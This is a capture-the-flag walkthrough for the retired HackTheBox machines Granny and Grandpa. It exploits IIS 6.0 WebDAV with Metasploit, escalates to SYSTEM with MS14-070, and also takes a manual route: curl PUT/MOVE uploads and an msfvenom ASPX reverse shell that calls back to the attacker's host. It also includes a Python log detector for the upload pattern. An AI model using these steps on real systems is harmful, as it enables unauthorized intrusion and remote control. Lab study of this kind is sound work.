HTB Walkthrough: Granny Grandpa Metasploit (retired)
Granny and Grandpa are retired boxes on HTB and are part of TJ Null's list of OSCP-like boxes.


Hostname: Granny, Grandpa | Difficulty Level: Easy | Operating System: Windows
Granny and Grandpa can be exploited in exactly the same way; I will show the steps for Granny.
NMAP Scan
┌──(kali㉿kali)-[~/labs/HTB/Granny]
└─$ nmap -sC -sV -oA Granny 10.10.10.15
Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-21 15:15 EDT
Nmap scan report for 10.10.10.15
Host is up (0.026s latency).
Not shown: 999 filtered ports
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 6.0
| http-methods:
|_ Potentially risky methods: TRACE DELETE COPY MOVE PROPFIND PROPPATCH SEARCH MKCOL LOCK UNLOCK PUT
|_http-server-header: Microsoft-IIS/6.0
|_http-title: Under Construction
| http-webdav-scan:
| Server Type: Microsoft-IIS/6.0
| Server Date: Wed, 21 Apr 2021 19:29:52 GMT
| Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
| Allowed Methods: OPTIONS, TRACE, GET, HEAD, DELETE, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, MKCOL, LOCK, UNLOCK
|_ WebDAV type: Unknown
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
NOTE: Update Kali and Metasploit if you hit the error 'Exploit completed, but no session created'. Also, the machine keeps dying (hence the name), so be quick; that is another reason to exploit it with Metasploit.
METASPLOIT
From nmap, we can see port 80 is running IIS 6.0.
┌──(kali㉿kali)-[~]
└─$ sudo msfdb run
msf6 > search IIS 6.0
The search returns 3 exploits. I tried all of them, and 'windows/iis/iis_webdav_scstoragepathfromurl' worked for me. The nmap scan also hints at WebDAV being in use.
msf6 > use 2
msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > set RHOSTS 10.10.10.15
msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > set LHOST <Kali IP>
msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > exploit
meterpreter > getuid
[-] 1055: Operation failed: Access is denied.
The "Access is denied" error above means our current process cannot be queried, so we have to migrate to another process. Background the shell first, then migrate.
meterpreter > background
msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > use post/windows/manage/migrate
msf6 post(windows/manage/migrate) > set SESSION 1
msf6 post(windows/manage/migrate) > exploit
msf6 post(windows/manage/migrate) > sessions 1
meterpreter > getuid
Server username: NT AUTHORITY\NETWORK SERVICE
We have ‘Network Service’ privileges now. But we still do not have access to
meterpreter > background
msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > use post/multi/recon/local_exploit_suggester
msf6 post(multi/recon/local_exploit_suggester) > set SESSION 1
msf6 post(multi/recon/local_exploit_suggester) > exploit
[*] 10.10.10.15 - Collecting local exploits for x86/windows...
[*] 10.10.10.15 - 35 exploit checks are being tried...
nil versions are discouraged and will be deprecated in Rubygems 4
[+] 10.10.10.15 - exploit/windows/local/ms10_015_kitrap0d: The service is running, but could not be validated.
[+] 10.10.10.15 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.10.15 - exploit/windows/local/ms14_070_tcpip_ioctl: The target appears to be vulnerable.
[+] 10.10.10.15 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] 10.10.10.15 - exploit/windows/local/ms16_016_webdav: The service is running, but could not be validated.
[+] 10.10.10.15 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.
[*] Post module execution completed
Four exploits are reported as applicable; I selected MS14-070.
msf6 post(multi/recon/local_exploit_suggester) > use exploit/windows/local/ms14_070_tcpip_ioctl
msf6 exploit(windows/local/ms14_070_tcpip_ioctl) > set SESSION 1
msf6 exploit(windows/local/ms14_070_tcpip_ioctl) > set LHOST <Kali IP>
msf6 exploit(windows/local/ms14_070_tcpip_ioctl) > set LPORT 9998
msf6 exploit(windows/local/ms14_070_tcpip_ioctl) > run
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > shell
From this SYSTEM shell you can read both the user and root flags.
MANUAL EXPLOITATION
Since WebDAV is in use, check which file types the server lets us upload and execute with davtest.
┌──(kali㉿kali)-[~/labs/HTB/Granny]
└─$ davtest -url http://10.10.10.15
Checking for test file execution
EXEC cfm FAIL
EXEC html SUCCEED: http://10.10.10.15/DavTestDir_sRiowRgHTws/davtest_sRiowRgHTws.html
EXEC txt SUCCEED: http://10.10.10.15/DavTestDir_sRiowRgHTws/davtest_sRiowRgHTws.txt
From the output above, we can upload html and txt files.
Let us first upload (PUT) a test file and fetch it to confirm it is served. Then rename it (MOVE) from .html to .aspx so that IIS executes it.
┌──(kali㉿kali)-[~/labs/HTB/Granny]
└─$ curl -X PUT http://10.10.10.15/test.html -d @test.html
┌──(kali㉿kali)-[~/labs/HTB/Granny]
└─$ curl http://10.10.10.15/test.html
<html><body> Hey </body></html>
┌──(kali㉿kali)-[~/labs/HTB/Granny]
└─$ curl -X MOVE --header 'DESTINATION:http://10.10.10.15/test.aspx' 'http://10.10.10.15/test.html'
┌──(kali㉿kali)-[~/labs/HTB/Granny]
└─$ curl http://10.10.10.15/test.aspx
<html><body> Hey </body></html>
EXPLOITATION
Now replace the test file with an ASPX reverse shell generated with msfvenom.
┌──(kali㉿kali)-[~/labs/HTB/Granny]
└─$ msfvenom -p windows/shell_reverse_tcp -f aspx LHOST=<Kali IP> LPORT=9876 -o reverse-shell.aspx
┌──(kali㉿kali)-[~/labs/HTB/Granny]
└─$ cp reverse-shell.aspx shell.txt
Make sure to use curl's --data-binary flag when uploading the ASPX payload saved as shell.txt, so the file is sent unmodified.
┌──(kali㉿kali)-[~/labs/HTB/Granny]
└─$ curl -X PUT http://10.10.10.15/shell.txt --data-binary @shell.txt
┌──(kali㉿kali)-[~/labs/HTB/Granny]
└─$ curl http://10.10.10.15/shell.txt
┌──(kali㉿kali)-[~/labs/HTB/Granny]
└─$ curl -X MOVE --header 'DESTINATION:http://10.10.10.15/shell.aspx' 'http://10.10.10.15/shell.txt'
Start a netcat listener on port 9876 before running the command below.
┌──(kali㉿kali)-[~/labs/HTB/Granny]
└─$ curl http://10.10.10.15/shell.aspx
This returns a reverse shell. Unfortunately, the account it runs as has no access to the user flag.
C:\Documents and Settings>whoami
whoami
nt authority\network service
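As a defender's counterpart to the PUT/MOVE/GET sequence above, here is an added Python example (my own, not part of the original walkthrough) that correlates IIS W3C log lines per client and flags an upload that is renamed and then fetched as a script. The log lines are constructed samples and the field order is the assumed IIS 6.0 default; a "#Fields:" header in a real log overrides it.

```python
"""Flag the WebDAV PUT -> MOVE -> GET staging pattern in IIS 6.0 W3C logs."""
from collections import defaultdict
from os.path import splitext

# Extensions IIS hands to a script engine: a MOVE onto one of these turns an upload into code.
EXEC_EXT = {".asp", ".aspx", ".asa", ".ashx", ".asmx"}
# Assumed default field order; a "#Fields:" header in the log overrides it.
FIELDS = ["date", "time", "s-ip", "cs-method", "cs-uri-stem", "cs-uri-query",
          "s-port", "cs-username", "c-ip", "cs(User-Agent)", "sc-status",
          "sc-substatus", "sc-win32-status"]
# Constructed sample mirroring the walkthrough's PUT/MOVE/GET sequence (not a real capture).
SAMPLE_LOG = """#Software: Microsoft Internet Information Services 6.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status sc-substatus sc-win32-status
2021-04-21 19:40:01 10.10.10.15 GET /index.htm - 80 - 10.10.14.2 curl/7.74.0 200 0 0
2021-04-21 19:40:05 10.10.10.15 PUT /shell.txt - 80 - 10.10.14.2 curl/7.74.0 201 0 0
2021-04-21 19:40:09 10.10.10.15 MOVE /shell.txt - 80 - 10.10.14.2 curl/7.74.0 201 0 0
2021-04-21 19:40:15 10.10.10.15 GET /shell.aspx - 80 - 10.10.14.2 curl/7.74.0 200 0 0
2021-04-21 19:41:00 10.10.10.15 GET /default.aspx - 80 - 10.10.14.9 Mozilla/5.0 200 0 0
"""

def parse_w3c(text):
    """Yield one dict per request line, honouring a #Fields: header."""
    fields = FIELDS
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#"):
            parts = line.split()
            if len(parts) == len(fields):
                yield dict(zip(fields, parts))

def find_webdav_staging(text):
    """Return (client, moved_uploads, executed_uri) for each client that PUT a file, MOVEd it,
    then fetched a script path it never uploaded directly; IIS does not log the MOVE
    Destination header, so that later GET is the observable tell."""
    uploads, moved, findings = defaultdict(set), defaultdict(set), []
    for rec in parse_w3c(text):
        client, method = rec["c-ip"], rec["cs-method"].upper()
        uri, status = rec["cs-uri-stem"].lower(), rec["sc-status"]
        if not status.startswith("2"):
            continue  # only successful requests advance the chain
        if method == "PUT":
            uploads[client].add(uri)
        elif method == "MOVE" and uri in uploads[client]:
            moved[client].add(uri)
        elif (method == "GET" and splitext(uri)[1] in EXEC_EXT
              and moved[client] and uri not in uploads[client]):
            findings.append((client, sorted(moved[client]), uri))
    return findings
```

A legitimate WebDAV author can produce the same sequence, so treat a hit as a lead to confirm against the file on disk rather than as proof of compromise.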
The machine keeps timing out, so instead we run Windows Exploit Suggester against the output of the systeminfo command collected from the reverse shell.
┌──(kali㉿kali)-[~/labs/HTB/opt]
└─$ ./windows-exploit-suggester.py --systeminfo ~/labs/HTB/Granny/systeminfo.txt -d 2021-04-20-mssb.xls
[+] [E] exploitdb PoC, [M] Metasploit module, [*] missing bulletin
[+] windows version identified as 'Windows 2003 SP2 32-bit'
[*]
[*] https://github.com/hfiref0x/CVE-2015-1701, Win32k Elevation of Privilege Vulnerability, PoC
[*] https://www.exploit-db.com/exploits/37367/ -- Windows ClientCopyImage Win32k Exploit, MSF
[*]
[E] MS15-010: Vulnerabilities in Windows Kernel-Mode Driver Could Allow Remote Code Execution (3036220) - Critical
[*] https://www.exploit-db.com/exploits/39035/ -- Microsoft Windows 8.1 - win32k Local Privilege Escalation (MS15-010), PoC
[*] https://www.exploit-db.com/exploits/37098/ -- Microsoft Windows - Local Privilege Escalation (MS15-010), PoC
[*] https://www.exploit-db.com/exploits/39035/ -- Microsoft Windows win32k Local Privilege Escalation (MS15-010), PoC
[*]
[E] MS14-070: Vulnerability in TCP/IP Could Allow Elevation of Privilege (2989935) - Important
[*] http://www.exploit-db.com/exploits/35936/ -- Microsoft Windows Server 2003 SP2 - Privilege Escalation, PoC
[*]
[E] MS14-068: Vulnerability in Kerberos Could Allow Elevation of Privilege (3011780) - Critical
[*] http://www.exploit-db.com/exploits/35474/ -- Windows Kerberos - Elevation of Privilege (MS14-068), PoC
[*]
[M] MS14-064: Vulnerabilities in Windows OLE Could Allow Remote Code Execution (3011443) - Critical
[*] https://www.exploit-db.com/exploits/37800// -- Microsoft Windows HTA (HTML Application) - Remote Code Execution (MS14-064), PoC
[*] http://www.exploit-db.com/exploits/35308/ -- Internet Explorer OLE Pre-IE11 - Automation Array Remote Code Execution / Powershell VirtualAlloc (MS14-064), PoC
[*] http://www.exploit-db.com/exploits/35229/ -- Internet Explorer <= 11 - OLE Automation Array Remote Code Execution (#1), PoC
[*] http://www.exploit-db.com/exploits/35230/ -- Internet Explorer < 11 - OLE Automation Array Remote Code Execution (MSF), MSF
[*] http://www.exploit-db.com/exploits/35235/ -- MS14-064 Microsoft Windows OLE Package Manager Code Execution Through Python, MSF
[*] http://www.exploit-db.com/exploits/35236/ -- MS14-064 Microsoft Windows OLE Package Manager Code Execution, MSF
[*] http://www.exploit-db.com/exploits/34112/ -- Microsoft Windows XP SP3 MQAC.sys - Arbitrary Write Privilege Escalation, PoC
[*] http://www.exploit-db.com/exploits/34982/ -- Microsoft Bluetooth Personal Area Networking (BthPan.sys) Privilege Escalation
[*]
[*] http://www.exploit-db.com/exploits/35101/ -- Windows TrackPopupMenu Win32k NULL Pointer Dereference, MSF
[*]
[E] MS14-040: Vulnerability in Ancillary Function Driver (AFD) Could Allow Elevation of Privilege (2975684) - Important
[*] https://www.exploit-db.com/exploits/39525/ -- Microsoft Windows 7 x64 - afd.sys Privilege Escalation (MS14-040), PoC
[*] https://www.exploit-db.com/exploits/39446/ -- Microsoft Windows - afd.sys Dangling Pointer Privilege Escalation (MS14-040), PoC
[*]
[E] MS14-035: Cumulative Security Update for Internet Explorer (2969262) - Critical
[E] MS14-029: Security Update for Internet Explorer (2962482) - Critical
[*] http://www.exploit-db.com/exploits/34458/
[*]
[E] MS14-026: Vulnerability in .NET Framework Could Allow Elevation of Privilege (2958732) - Important
[*] http://www.exploit-db.com/exploits/35280/, -- .NET Remoting Services Remote Command Execution, PoC
[E] MS14-002: Vulnerability in Windows Kernel Could Allow Elevation of Privilege (2914368) - Important
[E] MS13-101: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (2880430) - Important
[E] MS12-037: Cumulative Security Update for Internet Explorer (2699988) - Critical
[*] http://www.exploit-db.com/exploits/35273/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5., PoC
[*] http://www.exploit-db.com/exploits/34815/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5.0 Bypass (MS12-037), PoC
[E] MS11-011: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (2393802) - Important
Since the machine kept timing out, I did not continue down the manual path. Feel free to work on it.